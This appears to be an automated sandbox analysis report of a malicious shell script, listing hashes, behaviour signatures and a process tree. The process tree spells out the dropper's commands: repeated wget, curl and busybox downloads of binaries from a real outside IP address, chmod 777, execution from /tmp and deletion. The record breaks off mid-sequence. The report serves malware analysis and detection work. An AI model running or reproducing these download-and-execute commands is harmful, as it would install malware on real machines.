Analysis
-
max time kernel
87s -
max time network
92s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
-
Size
10KB
-
MD5
ba972d8a71d4f6e168a2e85fed85abb5
-
SHA1
d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
-
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
-
SHA512
9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
-
SSDEEP
192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 956 chmod 968 chmod 878 chmod 884 chmod 845 chmod 797 chmod 805 chmod 851 chmod 866 chmod 908 chmod 920 chmod 974 chmod 758 chmod 926 chmod 938 chmod 944 chmod 839 chmod 914 chmod 788 chmod 890 chmod 932 chmod 950 chmod 962 chmod 872 chmod 896 chmod 902 chmod 980 chmod 860 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 759 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw 790 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ 798 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q 806 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 840 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 846 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 852 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 861 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 867 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 873 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 879 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 885 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 891 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 897 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 903 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 909 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 915 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 921 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 927 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 933 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 939 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 945 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 951 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 957 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 963 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw 969 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ 975 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q 981 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 811 wget 838 busybox 948 curl 951 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 952 rm 831 curl 840 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 841 rm 947 wget 949 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q curl File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ curl File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ curl File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q curl
Processes
-
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:739
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:762
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:763
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:785
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:796
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:802
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:840
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:844
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:850
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:859
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:865
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:871
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:877
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:883
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:889
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:895
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:901
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:907
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:913
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:919
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:925
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:931
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:937
-
-
